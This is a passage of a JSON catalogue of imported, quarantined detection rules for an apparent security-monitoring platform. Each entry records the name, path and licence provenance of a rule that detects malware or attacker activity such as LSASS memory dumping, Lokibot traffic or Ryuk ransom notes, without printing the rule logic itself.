"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lojack-doubleagent-communication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lojack_doubleagent_communication", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/lojack_double_agent_communication.yaral" } }, { "id": "chronicle-detection-rules-lojax-malware-proxyfirewall", "type": "detection", "name": "lojax_malware_proxyfirewall", "description": "lojax_malware_proxyfirewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lojax-malware-proxyfirewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lojax_malware_proxyfirewall", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/lojax_malware__proxy_firewall.yaral" } }, { "id": "chronicle-detection-rules-lokibot-detector-windows10-sysmon-behavior", "type": "detection", "name": 
"lokibot_detector_windows10_sysmon_behavior", "description": "lokibot_detector_windows10_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-detector-windows10-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_detector_windows10_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_detector__windows10___sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-lokibot-malware-detector-sysmon-behavior", "type": "detection", "name": "lokibot_malware_detector_sysmon_behavior", "description": "lokibot_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-lokibot-malware-detector-sysmon-behavior-july-2019", "type": "detection", "name": "lokibot_malware_detector_sysmon_behavior_july_2019", "description": "lokibot_malware_detector_sysmon_behavior_july_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-malware-detector-sysmon-behavior-july-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lokibot_malware_detector_sysmon_behavior_july_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_malware_detector__sysmon_behavior___july_2019.yaral" } }, { "id": "chronicle-detection-rules-lokibot-trojan-behavior-sysmon", "type": "detection", "name": "lokibot_trojan_behavior_sysmon", "description": "lokibot_trojan_behavior_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-trojan-behavior-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "lokibot_trojan_behavior_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/lokibot_trojan_behavior__sysmon.yaral" } }, { "id": "chronicle-detection-rules-lolbas-wslexe-via-cmdline", "type": "detection", "name": "lolbas_wslexe_via_cmdline", "description": "lolbas_wslexe_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lolbas-wslexe-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lolbas_wslexe_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/lolbas_wsl_exe__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-low-prevalence-hash-on-process-launch-low-prevalence-domain-accessed", "type": "detection", "name": "low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed", "description": "low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/low-prevalence-hash-on-process-launch-low-prevalence-domain-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/low_prevalence_hash_on_process_launch_low_prevalence_domain_accessed.yaral" } }, { "id": "chronicle-detection-rules-lsass-access-detected-via-attack-surface-reduction", "type": "detection", "name": "lsass_access_detected_via_attack_surface_reduction", "description": "lsass_access_detected_via_attack_surface_reduction", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-access-detected-via-attack-surface-reduction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_access_detected_via_attack_surface_reduction", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows_defender/lsass_access_detected_via_attack_surface_reduction.yaral" } }, { "id": "chronicle-detection-rules-lsass-dump-keyword-command-line", "type": "detection", "name": "lsass_dump_keyword_command_line", "description": 
"lsass_dump_keyword_command_line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-dump-keyword-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_dump_keyword_command_line", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_dump_keyword_command_line.yaral" } }, { "id": "chronicle-detection-rules-lsass-memory-access-by-tool-dump-keyword-name", "type": "detection", "name": "lsass_memory_access_by_tool_dump_keyword_name", "description": "lsass_memory_access_by_tool_dump_keyword_name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-memory-access-by-tool-dump-keyword-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_memory_access_by_tool_dump_keyword_name", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_memory_access_by_tool_dump_keyword_name.yaral" } }, { "id": 
"chronicle-detection-rules-lsass-memory-dump-comsvcs-dll", "type": "detection", "name": "lsass_memory_dump_comsvcs_dll", "description": "lsass_memory_dump_comsvcs_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-memory-dump-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_memory_dump_comsvcs_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_memory_dump_comsvcs_dll.yaral" } }, { "id": "chronicle-detection-rules-lsass-process-memory-dump-file-creation", "type": "detection", "name": "lsass_process_memory_dump_file_creation", "description": "lsass_process_memory_dump_file_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-process-memory-dump-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_process_memory_dump_file_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/microsoft/windows/lsass_process_memory_dump_file_creation.yaral" } }, { "id": "chronicle-detection-rules-lsass-process-memory-dump-file-creation-taskmgr", "type": "detection", "name": "lsass_process_memory_dump_file_creation_taskmgr", "description": "lsass_process_memory_dump_file_creation_taskmgr", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsass-process-memory-dump-file-creation-taskmgr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lsass_process_memory_dump_file_creation_taskmgr", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/lsass_process_memory_dump_file_creation_taskmgr.yaral" } }, { "id": "chronicle-detection-rules-lsassexe-detected-running-from-a-suspicious-location", "type": "detection", "name": "lsassexe_detected_running_from_a_suspicious_location", "description": "lsassexe_detected_running_from_a_suspicious_location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lsassexe-detected-running-from-a-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "lsassexe_detected_running_from_a_suspicious_location", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/lsass_exe_detected_running_from_a_suspicious_location.yaral" } }, { "id": "chronicle-detection-rules-malicious-base64-encoded-powershell-keywords-in-command-lines", "type": "detection", "name": "malicious_base64_encoded_powershell_keywords_in_command_lines", "description": "malicious_base64_encoded_powershell_keywords_in_command_lines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-base64-encoded-powershell-keywords-in-command-lines.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_base64_encoded_powershell_keywords_in_command_lines", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.yaral" } }, { "id": "chronicle-detection-rules-malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior", "type": "detection", "name": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior", "description": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/file_event/malicious_behaviour_on_user_login__microsoft_windows___c0d0s0_group_behavior_part_1.yaral" } }, { "id": "chronicle-detection-rules-malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior-part-1", "type": "detection", "name": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior_part_1", "description": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-behaviour-on-user-login-microsoft-windows-c0d0s0-group-behavior-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_behaviour_on_user_login_microsoft_windows__c0d0s0_group_behavior_part_1", "source_commit": "74dd490", 
"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/file_event/malicious_behaviour_on_user_login__microsoft_windows___c0d0s0_group_behavior_part_2.yaral" } }, { "id": "chronicle-detection-rules-malicious-powershell-commandlet-names", "type": "detection", "name": "malicious_powershell_commandlet_names", "description": "malicious_powershell_commandlet_names", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-powershell-commandlet-names.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_powershell_commandlet_names", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/malicious_powershell_commandlet_names.yaral" } }, { "id": "chronicle-detection-rules-malicious-service-installations", "type": "detection", "name": "malicious_service_installations", "description": "malicious_service_installations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-service-installations.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_service_installations", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/malicious_service_installations.yaral" } }, { "id": "chronicle-detection-rules-malicious-utilization-of-mofcompexe-via-cmd", "type": "detection", "name": "malicious_utilization_of_mofcompexe_via_cmd", "description": "malicious_utilization_of_mofcompexe_via_cmd", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malicious-utilization-of-mofcompexe-via-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malicious_utilization_of_mofcompexe_via_cmd", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/malicious_utilization_of_mofcomp_exe_via_cmd.yaral" } }, { "id": "chronicle-detection-rules-malware-apt-grizzly-steppe-user-agent", "type": "detection", "name": "malware_apt_grizzly_steppe_user_agent", "description": "malware_apt_grizzly_steppe_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-apt-grizzly-steppe-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_apt_grizzly_steppe_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/apt_grizzly_steppe_user_agent.yaral" } }, { "id": "chronicle-detection-rules-malware-apt-plugx-user-agent", "type": "detection", "name": "malware_apt_plugx_user_agent", "description": "malware_apt_plugx_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-apt-plugx-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_apt_plugx_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/apt_plugx_user_agent.yaral" } }, { "id": "chronicle-detection-rules-malware-badnews-staging-exfil", "type": "detection", "name": "malware_badnews_staging_exfil", "description": "malware_badnews_staging_exfil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-badnews-staging-exfil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_badnews_staging_exfil", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/badnews_staging_exfil.yaral" } }, { "id": "chronicle-detection-rules-malware-bankshot", "type": "detection", "name": "malware_bankshot", "description": "malware_bankshot", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-bankshot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_bankshot", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/bankshot.yaral" } }, { "id": "chronicle-detection-rules-malware-dridex-dropper-doc-20191217", "type": "detection", "name": "malware_dridex_dropper_doc_20191217", "description": "malware_dridex_dropper_doc_20191217", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-dridex-dropper-doc-20191217.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_dridex_dropper_doc_20191217", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/dridex_dropper_doc_20191217.yaral" } }, { "id": "chronicle-detection-rules-malware-gallium", "type": "detection", "name": "malware_gallium", "description": "malware_gallium", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-gallium.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_gallium", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/gallium.yaral" } }, { "id": "chronicle-detection-rules-malware-httpbrowser", "type": "detection", "name": "malware_httpbrowser", "description": "malware_httpbrowser", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/malware-httpbrowser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_httpbrowser", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/httpbrowser.yaral" } }, { "id": "chronicle-detection-rules-malware-lokibot-c2", "type": "detection", "name": "malware_lokibot_c2", "description": "malware_lokibot_c2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-lokibot-c2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_lokibot_c2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/lokibot_c2.yaral" } }, { "id": "chronicle-detection-rules-malware-rawpos", "type": "detection", "name": "malware_rawpos", "description": "malware_rawpos", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-rawpos.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_rawpos", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/rawpos.yaral" } }, { "id": "chronicle-detection-rules-malware-ryuk-ransomnote-created", "type": "detection", "name": "malware_ryuk_ransomnote_created", "description": "malware_ryuk_ransomnote_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-ryuk-ransomnote-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_ryuk_ransomnote_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/ryuk_ransomnote_created.yaral" } }, { "id": "chronicle-detection-rules-malware-servhelper-bot", "type": "detection", "name": "malware_servhelper_bot", "description": "malware_servhelper_bot", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-servhelper-bot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "chronicle/detection-rules", "source_id": "malware_servhelper_bot", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/servhelper_bot.yaral" } }, { "id": "chronicle-detection-rules-malware-servhelper-nsis-dropper", "type": "detection", "name": "malware_servhelper_nsis_dropper", "description": "malware_servhelper_nsis_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-servhelper-nsis-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_servhelper_nsis_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/servhelper_nsis_dropper.yaral" } }, { "id": "chronicle-detection-rules-malware-sload-dropper", "type": "detection", "name": "malware_sload_dropper", "description": "malware_sload_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 